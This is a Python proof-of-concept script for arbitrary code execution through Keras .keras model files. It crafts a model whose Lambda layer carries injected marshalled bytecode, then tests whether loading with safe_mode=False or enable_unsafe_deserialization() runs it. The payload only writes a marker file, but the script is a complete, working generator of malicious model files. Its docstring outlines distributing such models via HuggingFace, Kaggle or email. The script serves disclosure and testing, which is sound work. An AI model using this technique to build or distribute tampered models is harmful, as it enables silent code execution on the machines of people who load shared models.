File size: 8,712 Bytes
56f70cb
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
#!/usr/bin/env python3
"""
Keras .keras Lambda Layer - Arbitrary Code Execution PoC

VULNERABILITY:
  .keras model files are ZIP archives containing config.json. Lambda layers
  store base64-encoded marshal'd Python bytecode in config.json under the
  "function" -> "config" -> "code" key. When a model is loaded with
  safe_mode=False (or after calling tf.keras.config.enable_unsafe_deserialization()),
  this bytecode is unmarshalled and executed - enabling arbitrary code execution
  from a crafted model file.

IMPACT:
  Any user who loads an untrusted .keras file with safe_mode=False gets arbitrary
  code execution. Many official tutorials and StackOverflow answers recommend
  safe_mode=False to load models with custom layers. HuggingFace hosts thousands
  of .keras files that could be replaced with malicious versions.

ATTACK VECTOR:
  1. Attacker creates a legitimate-looking .keras model
  2. Attacker replaces Lambda layer bytecode with malicious payload
  3. Victim downloads model from HuggingFace, Kaggle, or email
  4. Victim loads with safe_mode=False -> code executes silently

AFFECTED:
  - keras >= 3.0 (all versions using .keras format)
  - tensorflow >= 2.16 (ships keras 3.x)

TESTED: TensorFlow 2.20.0, Keras 3.13.2, Python 3.12

Usage:
  python3 poc_keras_lambda_ace.py
"""

import os
import sys
import json
import zipfile
import marshal
import base64
import types
import tempfile
import shutil

# Silence TensorFlow's C++ logging (3 = errors only); must be set before TF is imported.
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"

# Path the injected payload writes to; its existence proves code execution.
MARKER_FILE = "/tmp/keras_ace_marker.txt"
# Sentinel string the payload writes into MARKER_FILE.
PAYLOAD_MSG = "KERAS_LAMBDA_ACE_CONFIRMED"


def create_malicious_keras_model(output_path):
    """Build a benign Keras model, then inject marshal'd bytecode into its
    Lambda layer config and repack the .keras archive at *output_path*.

    The payload lambda writes PAYLOAD_MSG to MARKER_FILE as a side effect and
    returns its input unchanged, so the tampered model still runs inference.

    Exits the process (sys.exit(1)) if no Lambda layer is found in config.json.
    """
    import tensorflow as tf

    print("[*] Step 1: Building legitimate model with Lambda layer...")
    model = tf.keras.Sequential([
        tf.keras.layers.Input(shape=(5,)),
        tf.keras.layers.Dense(10, name="dense_1"),
        tf.keras.layers.Lambda(lambda x: x * 2, name="lambda_layer"),
        tf.keras.layers.Dense(1, name="output"),
    ])
    model.compile(optimizer="adam", loss="mse")

    tmp_dir = tempfile.mkdtemp(prefix="keras_poc_")
    try:
        legit_path = os.path.join(tmp_dir, "legit.keras")
        model.save(legit_path)
        print("    Saved legitimate model: {} ({} bytes)".format(legit_path, os.path.getsize(legit_path)))

        print("[*] Step 2: Extracting .keras ZIP and injecting malicious bytecode...")
        # .keras files are plain ZIP archives; pull every member into memory.
        with zipfile.ZipFile(legit_path, "r") as zf:
            archive_files = {name: zf.read(name) for name in zf.namelist()}
    finally:
        # Remove the scratch dir even if save/extract raises (was leaked before).
        shutil.rmtree(tmp_dir)

    config = json.loads(archive_files["config.json"])

    # Side-effecting lambda: write the marker, then return x so shapes still match.
    evil_source = "lambda x: (__import__('builtins').open('{}', 'w').write('{}\\n'), x)[-1]".format(
        MARKER_FILE, PAYLOAD_MSG
    )
    print("    Payload: write '{}' to {}".format(PAYLOAD_MSG, MARKER_FILE))

    # Compiling the expression yields a code object whose co_consts holds the
    # lambda's code object -- the same thing Keras marshals for Lambda layers.
    evil_expr = compile(evil_source, "<payload>", "eval")
    lambda_code = next(c for c in evil_expr.co_consts if isinstance(c, types.CodeType))

    evil_b64 = base64.b64encode(marshal.dumps(lambda_code)).decode() + "\n"
    print("    Encoded bytecode: {} chars".format(len(evil_b64)))

    def inject_into_lambda(obj):
        # Depth-first search for the first Lambda layer entry in the config
        # tree; overwrite its serialized function bytecode. Returns True on hit.
        if isinstance(obj, dict):
            if obj.get("class_name") == "Lambda" and "config" in obj:
                func = obj["config"].get("function", {})
                if isinstance(func, dict) and "config" in func:
                    func["config"]["code"] = evil_b64
                    print("    Injected payload into Lambda layer config")
                    return True
            for v in obj.values():
                if isinstance(v, (dict, list)) and inject_into_lambda(v):
                    return True
        elif isinstance(obj, list):
            for v in obj:
                if inject_into_lambda(v):
                    return True
        return False

    if not inject_into_lambda(config):
        print("    ERROR: Could not find Lambda layer in config.json")
        sys.exit(1)

    print("[*] Step 3: Repacking .keras file with malicious config...")
    archive_files["config.json"] = json.dumps(config).encode()
    with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in archive_files.items():
            zf.writestr(name, data)

    print("    Malicious model: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))


def test_safe_mode_true(model_path):
    """Try loading the crafted model with the default safe_mode=True.

    Expected outcome: Keras refuses to deserialize the Lambda bytecode and
    raises, so this returns False. Returns True only if the payload marker
    appeared despite the safeguard.
    """
    import tensorflow as tf

    print("\n[*] Test A: Loading with safe_mode=True (default)...")
    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)

    try:
        tf.keras.models.load_model(model_path)
        print("    Model loaded (unexpected)")
        marker_written = os.path.exists(MARKER_FILE)
    except Exception as e:
        print("    Blocked as expected: {}".format(str(e)[:150]))
        marker_written = False
    return marker_written


def test_safe_mode_false(model_path):
    """Load the crafted model with safe_mode=False and check whether the
    injected bytecode executed, either at load time or during inference.

    Returns True if arbitrary code execution was confirmed (marker written).
    """
    import tensorflow as tf
    import numpy as np

    def _marker_content():
        # Marker file contents (stripped), or None if the payload never ran.
        if not os.path.exists(MARKER_FILE):
            return None
        with open(MARKER_FILE) as f:
            return f.read().strip()

    print("\n[*] Test B: Loading with safe_mode=False...")
    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)
    try:
        loaded = tf.keras.models.load_model(model_path, safe_mode=False)
        print("    Model loaded with safe_mode=False")

        content = _marker_content()
        if content is not None:
            print("    >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content))
            return True

        # Some versions only execute the Lambda when the graph actually runs.
        print("    No execution on load. Running inference...")
        result = loaded.predict(np.random.randn(1, 5), verbose=0)
        print("    Inference result: {}".format(result))

        content = _marker_content()
        if content is not None:
            print("    >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content))
            return True

        print("    No ACE triggered")
        return False
    except Exception as e:
        print("    Error: {}".format(str(e)[:300]))
        return False


def test_enable_unsafe_deserialization(model_path):
    """Load the crafted model after globally enabling unsafe deserialization
    via tf.keras.config.enable_unsafe_deserialization().

    NOTE: this flips a process-global flag and does not restore it afterwards.
    Returns True if arbitrary code execution was confirmed (marker written).
    """
    import tensorflow as tf
    import numpy as np

    def _marker_content():
        # Marker file contents (stripped), or None if the payload never ran.
        if not os.path.exists(MARKER_FILE):
            return None
        with open(MARKER_FILE) as f:
            return f.read().strip()

    print("\n[*] Test C: Loading with enable_unsafe_deserialization()...")
    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)
    try:
        tf.keras.config.enable_unsafe_deserialization()
        loaded = tf.keras.models.load_model(model_path)
        print("    Model loaded with enable_unsafe_deserialization")

        content = _marker_content()
        if content is not None:
            print("    >>> ACE CONFIRMED ON LOAD: marker = '{}'".format(content))
            return True

        # Some versions only execute the Lambda when the graph actually runs.
        print("    No execution on load. Running inference...")
        result = loaded.predict(np.random.randn(1, 5), verbose=0)
        # Print the result for parity with test B (was computed then dropped).
        print("    Inference result: {}".format(result))

        content = _marker_content()
        if content is not None:
            print("    >>> ACE CONFIRMED ON INFERENCE: marker = '{}'".format(content))
            return True

        print("    No ACE triggered")
        return False
    except Exception as e:
        print("    Error: {}".format(str(e)[:300]))
        return False


def main():
    """Drive the PoC: craft the malicious model, then run all three load tests
    and summarize which loading modes allowed the payload to execute."""
    banner = "=" * 70
    print(banner)
    print("Keras .keras Lambda Layer - Arbitrary Code Execution PoC")
    print(banner)

    script_dir = os.path.dirname(os.path.abspath(__file__))
    malicious_model = os.path.join(script_dir, "malicious_lambda.keras")

    # Start from a clean slate so a stale marker can't produce a false positive.
    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)

    create_malicious_keras_model(malicious_model)

    ace_safe = test_safe_mode_true(malicious_model)
    ace_unsafe = test_safe_mode_false(malicious_model)
    ace_global = test_enable_unsafe_deserialization(malicious_model)

    print("\n" + banner)
    print("RESULTS:")
    safe_label = "ACE!" if ace_safe else "Blocked (correct)"
    unsafe_label = "ACE!" if ace_unsafe else "No ACE"
    global_label = "ACE!" if ace_global else "No ACE"
    print("  safe_mode=True (default):           {}".format(safe_label))
    print("  safe_mode=False:                    {}".format(unsafe_label))
    print("  enable_unsafe_deserialization():     {}".format(global_label))
    print()

    if not (ace_unsafe or ace_global):
        print("No ACE triggered. Check TensorFlow/Keras version.")
    else:
        print("VULNERABILITY CONFIRMED: .keras Lambda bytecode enables arbitrary")
        print("code execution when loaded with safe_mode=False or after calling")
        print("enable_unsafe_deserialization().")
        print()
        print("Marker file: {}".format(MARKER_FILE))
        if os.path.exists(MARKER_FILE):
            with open(MARKER_FILE) as f:
                print("Contents: {}".format(f.read().strip()))
        print("\nMalicious model saved to: {}".format(malicious_model))

    print(banner)


if __name__ == "__main__":
    main()